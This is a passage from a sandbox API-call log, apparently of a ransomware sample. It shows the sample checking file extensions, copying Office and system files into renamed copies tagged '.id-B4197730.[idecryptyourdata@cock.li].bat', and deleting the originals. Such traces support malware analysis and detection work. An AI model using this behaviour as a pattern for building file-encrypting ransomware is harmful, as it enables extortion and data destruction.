(lpString1=".xlsx", lpString2="n.exe") returned -1 [0181.976] lstrlenW (lpString=".ppt") returned 4 [0181.976] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0181.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.976] lstrlenW (lpString=".zip") returned 4 [0181.976] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0181.976] lstrlenW (lpString=".rar") returned 4 [0181.976] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0181.976] lstrlenW (lpString=".bz2") returned 4 [0181.976] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0181.976] lstrlenW (lpString=".7z") returned 3 [0181.976] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0181.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.976] lstrlenW (lpString=".dbf") returned 4 [0181.976] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0181.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.976] lstrlenW (lpString=".1cd") returned 4 [0181.976] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0181.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.976] lstrlenW (lpString=".jpg") returned 4 [0181.976] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0181.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.976] lstrlenW (lpString=".doc") returned 4 [0181.976] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0181.976] lstrlenW (lpString=".docx") returned 5 [0181.976] lstrcmpiW (lpString1=".docx", lpString2="n.exe") returned -1 [0181.977] lstrlenW (lpString=".pdf") returned 4 [0181.977] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0181.977] lstrlenW (lpString=".xls") returned 4 [0181.977] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0181.977] lstrlenW (lpString=".xlsx") returned 5 [0181.977] lstrcmpiW (lpString1=".xlsx", lpString2="n.exe") returned -1 [0181.977] lstrlenW (lpString=".ppt") returned 4 [0181.977] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0181.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.977] lstrlenW (lpString=".zip") returned 4 [0181.977] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0181.977] lstrlenW (lpString=".rar") returned 4 [0181.977] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0181.977] lstrlenW (lpString=".bz2") returned 4 [0181.977] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0181.977] lstrlenW (lpString=".7z") returned 3 [0181.977] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0181.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.977] lstrlenW (lpString=".dbf") returned 4 [0181.977] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0181.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.977] lstrlenW (lpString=".1cd") returned 4 [0181.977] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0181.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 78 [0181.977] lstrlenW (lpString=".jpg") returned 4 [0181.977] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0181.978] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.978] lstrlenW (lpString="StreamServer.dll") returned 16 [0181.978] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.978] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=1053784) returned 1 [0181.978] CloseHandle (hObject=0x348) returned 1 [0181.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll")) returned 0x20 [0181.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.978] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.979] lstrlenW (lpString=".doc") returned 4 [0181.979] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.979] lstrlenW (lpString=".docx") returned 5 [0181.979] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0181.979] lstrlenW (lpString=".pdf") returned 4 [0181.979] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.979] lstrlenW (lpString=".xls") returned 4 [0181.979] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.979] lstrlenW (lpString=".xlsx") returned 5 [0181.979] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0181.979] lstrlenW (lpString=".ppt") returned 4 [0181.979] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.979] lstrlenW (lpString=".zip") returned 4 [0181.979] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.979] lstrlenW (lpString=".rar") returned 4 [0181.979] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.979] lstrlenW (lpString=".bz2") returned 4 [0181.979] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.979] lstrlenW (lpString=".7z") returned 3 [0181.979] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.979] lstrlenW (lpString=".dbf") returned 4 [0181.979] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.980] lstrlenW (lpString=".1cd") returned 4 [0181.980] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.980] lstrlenW (lpString=".jpg") returned 4 [0181.980] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.980] lstrlenW (lpString=".doc") returned 4 [0181.980] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString=".docx") returned 5 [0181.980] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0181.980] lstrlenW (lpString=".pdf") returned 4 [0181.980] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString=".xls") returned 4 [0181.980] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString=".xlsx") returned 5 [0181.980] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0181.980] lstrlenW (lpString=".ppt") returned 4 [0181.980] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.980] lstrlenW (lpString=".zip") returned 4 [0181.980] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString=".rar") returned 4 [0181.980] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.980] lstrlenW (lpString=".bz2") returned 4 [0181.980] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.980] lstrlenW (lpString=".7z") returned 3 [0181.980] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.981] lstrlenW (lpString=".dbf") returned 4 [0181.981] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.981] lstrlenW (lpString=".1cd") returned 4 [0181.981] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 74 [0181.981] lstrlenW (lpString=".jpg") returned 4 [0181.981] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.981] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.981] lstrlenW (lpString="ucrtbase.dll") returned 12 [0181.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.982] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=982720) returned 1 [0181.982] CloseHandle (hObject=0x348) returned 1 [0181.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll")) returned 0x20 [0181.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.982] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.982] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0181.983] GetLastError () returned 0x0 [0181.983] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0xefec0, lpOverlapped=0x0) returned 1 [0182.263] WriteFile (in: hFile=0x388, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xefed0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xefed0, lpOverlapped=0x0) returned 1 [0182.653] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.653] WriteFile (in: hFile=0x388, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.653] SetEndOfFile (hFile=0x388) returned 1 [0182.654] CloseHandle (hObject=0x388) returned 1 [0182.654] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.654] SetEndOfFile (hFile=0x348) returned 1 [0182.663] CloseHandle (hObject=0x348) returned 1 [0182.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0182.663] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll")) returned 1 [0182.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.663] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.663] lstrlenW (lpString=".doc") returned 4 [0182.663] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.664] lstrlenW (lpString=".docx") returned 5 [0182.664] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0182.664] lstrlenW (lpString=".pdf") returned 4 [0182.664] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.664] lstrlenW (lpString=".xls") returned 4 [0182.664] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.664] lstrlenW (lpString=".xlsx") returned 5 [0182.664] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0182.664] lstrlenW (lpString=".ppt") returned 4 [0182.664] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.664] lstrlenW (lpString=".zip") returned 4 [0182.664] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.664] lstrlenW (lpString=".rar") returned 4 [0182.664] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.664] lstrlenW (lpString=".bz2") returned 4 [0182.664] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.664] lstrlenW (lpString=".7z") returned 3 [0182.664] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.664] lstrlenW (lpString=".dbf") returned 4 [0182.664] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.664] lstrlenW (lpString=".1cd") returned 4 [0182.664] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.664] lstrlenW (lpString=".jpg") returned 4 [0182.664] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.665] lstrlenW (lpString=".doc") returned 4 [0182.665] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString=".docx") returned 5 [0182.665] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0182.665] lstrlenW (lpString=".pdf") returned 4 [0182.665] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString=".xls") returned 4 [0182.665] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString=".xlsx") returned 5 [0182.665] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0182.665] lstrlenW (lpString=".ppt") returned 4 [0182.665] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.665] lstrlenW (lpString=".zip") returned 4 [0182.665] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString=".rar") returned 4 [0182.665] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.665] lstrlenW (lpString=".bz2") returned 4 [0182.665] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.665] lstrlenW (lpString=".7z") returned 3 [0182.665] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.665] lstrlenW (lpString=".dbf") returned 4 [0182.665] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.665] lstrlenW (lpString=".1cd") returned 4 [0182.665] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 70 [0182.665] lstrlenW (lpString=".jpg") returned 4 [0182.665] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.666] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0182.666] lstrlenW (lpString="mraut.dll") returned 9 [0182.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0183.079] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=6368768) returned 1 [0183.079] CloseHandle (hObject=0x39c) returned 1 [0183.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll")) returned 0x20 [0183.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.079] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0183.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.079] lstrlenW (lpString=".doc") returned 4 [0183.079] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0183.079] lstrlenW (lpString=".docx") returned 5 [0183.079] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0183.079] lstrlenW (lpString=".pdf") returned 4 [0183.079] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0183.079] lstrlenW (lpString=".xls") returned 4 [0183.079] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0183.079] lstrlenW (lpString=".xlsx") returned 5 [0183.079] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0183.080] lstrlenW (lpString=".ppt") returned 4 [0183.080] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString=".zip") returned 4 [0183.080] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString=".rar") returned 4 [0183.080] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString=".bz2") returned 4 [0183.080] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0183.080] lstrlenW (lpString=".7z") returned 3 [0183.080] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString=".dbf") returned 4 [0183.080] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString=".1cd") returned 4 [0183.080] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString=".jpg") returned 4 [0183.080] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString=".doc") returned 4 [0183.080] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString=".docx") returned 5 [0183.080] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0183.080] lstrlenW (lpString=".pdf") returned 4 [0183.080] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString=".xls") returned 4 [0183.080] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString=".xlsx") returned 5 [0183.080] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0183.080] lstrlenW (lpString=".ppt") returned 4 [0183.080] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0183.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.080] lstrlenW (lpString=".zip") returned 4 [0183.080] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0183.081] lstrlenW (lpString=".rar") returned 4 [0183.081] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0183.081] lstrlenW (lpString=".bz2") returned 4 [0183.081] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0183.081] lstrlenW (lpString=".7z") returned 3 [0183.081] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0183.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.081] lstrlenW (lpString=".dbf") returned 4 [0183.081] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0183.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.081] lstrlenW (lpString=".1cd") returned 4 [0183.081] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0183.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 60 [0183.081] lstrlenW (lpString=".jpg") returned 4 [0183.081] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0183.081] lstrcmpiW (lpString1=".EXE", lpString2=".bat") returned 1 [0183.081] lstrlenW (lpString="OSE.EXE") returned 7 [0183.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0183.082] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=244296) returned 1 [0183.082] CloseHandle (hObject=0x39c) returned 1 [0183.082] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe")) returned 0x20 [0183.082] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0183.082] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.082] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0183.083] GetLastError () returned 0x0 [0183.083] ReadFile (in: hFile=0x39c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x3ba48, lpOverlapped=0x0) returned 1 [0183.823] WriteFile (in: hFile=0x3a0, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x3ba50, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x3ba50, lpOverlapped=0x0) returned 1 [0183.828] ReadFile (in: hFile=0x39c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, 